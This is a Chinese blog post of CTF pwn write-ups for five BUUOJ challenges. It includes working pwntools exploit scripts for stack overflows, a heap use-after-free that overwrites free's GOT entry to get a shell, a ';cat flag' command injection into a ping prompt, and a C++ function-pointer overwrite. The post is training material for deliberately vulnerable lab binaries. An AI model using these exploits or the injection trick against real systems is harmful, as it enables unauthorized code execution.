buuoj Pwn writeup 46-50

最新推荐文章于 2022-01-04 12:50:23 发布
最新推荐文章于 2022-01-04 12:50:23 发布
阅读量211 收藏
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113788251
版权
博客内容涉及多种信息安全技术,包括缓冲区溢出、堆管理漏洞利用和系统调用。通过示例代码展示了如何利用栈溢出和堆漏洞来控制系统执行,如修改函数指针、利用UAF(Use-After-Free)进行内存篡改,以及通过命令注入执行系统命令。此外,还提到了逆向工程在分析程序行为中的作用。
摘要由CSDN通过智能技术生成

46 jarvisoj_test_your_memory

保护
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述这个地方有个溢出。

在这里插入图片描述在这里插入图片描述
后门函数,cat flag都有,就直接一把梭。

from pwn import*

r = process('./46')

system_addr = 0x08048440

cat_flag = 0x080487E0

payload='A'*0x17 + p32(system_addr) + p32(cat_flag) + p32(cat_flag)

r.sendline(payload)

r.interactive()

47 babyfengshui_33c3_2016

保护
在这里插入图片描述在这里插入图片描述一看就知道是个堆。逻辑复杂。

add
在这里插入图片描述堆题首先就是要把它的结构分析清楚。
在这里插入图片描述delete
在这里插入图片描述指针就清空了一个,所以是有uaf的。

display
在这里插入图片描述输出函数平平无奇。

update
在这里插入图片描述又是菜单题 这非常的pwn
这种函数逐渐的引起了我的注意
所以这是个啥意思?
if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1] - 4 )

它其实是不想让我们像前面那道题一样一上来直接unlink,从而控制它的这个数组,也不能堆溢出。

但是其实你仔细研究一下的话会发现这个检查机制很初级,有问题,它只能检测内存分配的时候description的chunk与ptr指向的chunk不会发生溢出。

这个检查问题就出在它默认des一定在node上面而且贴在一起,但是呢,我们最后的结果就是构造了一种情况,des在node上面,但是不是贴在一起的,这就造成了能往中间写东西。

第一个图是申请了三个note,内存是这样的
上面所有大小都是0x80

将第一个node释放掉, 然后上面会空出来0x100大小的空间,然后再写一个0x100大小的des,就会有图二的结果。

然后des2到nod2都是可以写的,就蟹盖free的got表,改成sys,然后在des2里面写入/bin/sh,然后free2就行了

在这里插入图片描述

from pwn import *

context(arch='amd64', os='linux',log_level='debug')
context.terminal=['tmux','splitw','-h']
p = process('./47')
libc = ELF("/glibc/2.19/32/lib/libc-2.19.so")
elf=ELF("./babyfengshui")

def add(deslen,txtlen,text):
    p.sendlineafter("Action: ",str(0))
    p.sendlineafter("size of description: ",str(deslen))
    p.sendlineafter("name: ",'breeze')
    p.sendlineafter("text length: ",str(txtlen))
    p.sendlineafter("text: ",text)

def delete(id):
    p.sendlineafter("Action: ",str(1))
    p.sendlineafter("index: ",str(id))

def Display(id):
    p.sendlineafter("Action: ",str(2))
    p.sendlineafter("index: ",str(id))

def update(id,txtlen,text):
    p.sendlineafter("Action: ",str(3))
    p.sendlineafter("index: ",str(id))
    p.sendlineafter("text length: ",str(txtlen))
    p.sendlineafter("text: ",text)

free_got=elf.got['free']
add(0x20,0x20,'a'*0x20) #0
add(0x20,0x20,'a'*0x20) #1
delete(0)
add(0x80,0xb8,'a'*0xb0+p32(free_got)) #2
add(0x80,0x8,'/bin/sh\x00') #3

p.recvuntil("description: ")
leak=u32(p.recv(4))
libc_base=leak-(0xf7d9dc30 -0xf7d28000)
system_addr=libc_base+libc.symbols['system']
update(1,4,p32(system_addr))
delete(3)
p.interactive()

# -*- coding: utf-8 -*-
from pwn import *

context(arch='amd64', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
r = remote('node3.buuoj.cn', 28941)
#r = process('./47')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./47")


def add(deslen,txtlen,text):
    r.sendlineafter("Action: ","0")
    r.sendlineafter("size of description: ",str(deslen))
    r.sendlineafter("name: ",'yongibaoi')
    r.sendlineafter("text length: ",str(txtlen))
    r.sendlineafter("text: ",text)

#这里面包括下面都要注意0要写"0"
#deslen要写str(deslen)
#将他们转换成字符串类是因为你想输入的就是字符串

def delete(id):
    r.sendlineafter("Action: ",str(1))
    r.sendlineafter("index: ",str(id))

def Display(id):
    r.sendlineafter("Action: ",str(2))
    r.sendlineafter("index: ",str(id))

def update(id,txtlen,text):
    r.sendlineafter("Action: ",str(3))
    r.sendlineafter("index: ",str(id))
    r.sendlineafter("text length: ",str(txtlen))
    r.sendlineafter("text: ",text)

free_got=elf.got['free']

add(0x80, 0x80, 'a')
add(0x80, 0x80, 'a')
add(0x8, 0x8, '/bin/sh\x00')
delete(0)

add(0x100, 0x19c, "a"*0x198+p32(elf.got['free']))

Display(1)

r.recvuntil("description: ")

free_addr = u32(r.recv(4))

libc_base = free_addr - libc.sym['free']
sys_addr = libc_base + libc.sym['system']

update(1, 0x4, p32(sys_addr))
delete(2)

r.interactive()

48 picoctf_2018_buffer overflow 1

保护
在这里插入图片描述在这里插入图片描述
后门函数有了。
在这里插入图片描述
就平平无奇栈溢出。

from pwn import*

r = remote('node3.buuoj.cn', 28047)

cat_flag = 0x080485cb
ret_addr = 0x0804865c
payload='A' * 44 +  p32(cat_flag) 

r.sendline(payload)

r.interactive()

49 bjdctf_2020_router

保护

在这里插入图片描述在这里插入图片描述
这是什么玩意……

在这里插入图片描述1下面明显有个system

但是

在这里插入图片描述输命令会显示在ping它

利用了linux下的命令机制,命令1+;+命令2 这样的格式两种指令都会执行

所以就输入;cat flag
在这里插入图片描述就可以了。

50 [ZJCTF 2019]Login

保护

在这里插入图片描述
在这里插入图片描述C++类和对象都上了。

这后门函数看着是admin的。
在这里插入图片描述整个逻辑大概就是管理员的名字是Admin,然后密码是里面那一串。

逆向分析起来还是比较麻烦的,找关键地方。
在这里插入图片描述这里有call rax,分析rax的来源。

在这里插入图片描述
在这里插入图片描述
找到了read passwd里面的rax会用到var 18,从s覆盖过去就行。

from pwn import *
 
r = remote('node3.buuoj.cn',26816)
 
backdoor = 0x400e88
r.sendlineafter(': ','admin')
r.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*0x3a+p64(backdoor))
 
r.interactive()
yongbaoii
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
buuoj--sqlilabs
weixin_30270815的博客
03-21 800
CTF欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑
BUUOJ PWN 61-80
2h4ox1n9
12-17 258
61\
BUUOJ
zbbjya的博客
01-04 111
点击我们会看到网址栏哪里有一个/?file=flag.php 说明flag就在PHP的文件当中而现在我们没有看见flag 我们可以用、 页面跳转 变化了 然后你就会得到这样的数据 这样就会得到flag了
BUUOJ Fakebook
沐目的博客
10-22 570
关于源码泄露,我是真的懂的不多,而且刚开始发现有SQL注入,我以为就没了,但最后发现根本不是。 1.源码泄露 这题的关键点,就是找到源码,而找源码,就需要有好的工具(nikto)。存在robots.txt文件,里面有源码的路径。而再用御剑,发现falg.php文件。啥时候可以有一个完美的扫描工具。这还得扫两遍,谁能想的到! <?php class UserInfo { public...
buuoj-相册
bunner_的博客
01-17 308
解题 拿到手解压后是一个apk文件,扔到 jeb 中 根据题目提示,拿到完整邮箱即可,以及查看cn包下的文件名,用字符串搜索mail 【ctrl+F】 从上图中可以发现一个名为sendMailByJavaMail的函数,用快捷键q来看看源码 从上图发现v1.set_to(new String[](arg6)),该代码意为将arg6设置为邮件接收者,所以我们需要寻找调用该函数的代码【右键该函数,单击Cross references】 进入MainTask查看 发现第一个参数为C2.MAILSE
BUUOJ[FlareOn4]IgniteMe
阿東啊、
12-07 461
[FlareOn4]IgniteMe
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 371
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2512
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
初学pwn-攻防世界(level0)
天柱的博客
08-27 1013
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 618
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1533
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
buuoj-随便注
读万卷书,行万里路。
01-22 860
随便注 首先,使用 1'进行测试,判断是否存在 SQL 注入。从返回的结果可以看出,可能存在 SQL 注入 使用 1'可以将 SQL 语句构造成 select * from table where id='1'' limit 0,1。不符合 SQL 语句,所以会导致报错。 使用截断语句 1' #进行截断处理,使得后面的限制语句失效(limit或者其他)。1’ #,而不是1 # 类似的截断语句还...
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 541
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj [网鼎杯 2020 青龙组] AreUSerialz
会下雪的晴天
09-23 398
复现地址:https://buuoj.cn/ 拖了这么久才看网鼎杯。。这就是菜的原因吧 目录[网鼎杯 2020 青龙组]AreUSerialz [网鼎杯 2020 青龙组]AreUSerialz 知识点:代码审计 打开就是代码审计 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protect.
【CTF日记】BUUOJ
CH3UHX9
03-11 674
[HCTF 2018]WarmUp 题目介绍 这道题来自BUUCTF,传送门。 涉及的知识点包括: PHP代码审计 远程文件包含 题目代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
buuoj pwn
FFY's Blog
10-07 1070
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
buuoj [极客大挑战 2019]LoveSQL
pondzhang的专栏
04-03 359
报错注入: http://2c7ced76-2d5f-4690-bd62-4ca2c414de32.node3.buuoj.cn/check.php?username=admin' and extractvalue(1,concat(0x5c,(select user()))) and '1&password=67df2765f3da545f03860281ef7f964d http:...
Buuoj CTF Day01
qq_30015381的博客
12-20 115
Buuoj CTF Day01
[BUUOJ][MRCTF2020]Ezpop
Y4tacker的博客
09-22 5155
文章目录代码审计阶段Modifier类Show类Test类构造pop链 代码审计阶段 按照步骤一步一步分析 Modifier类 首先第一个Modifier类 class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var);
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值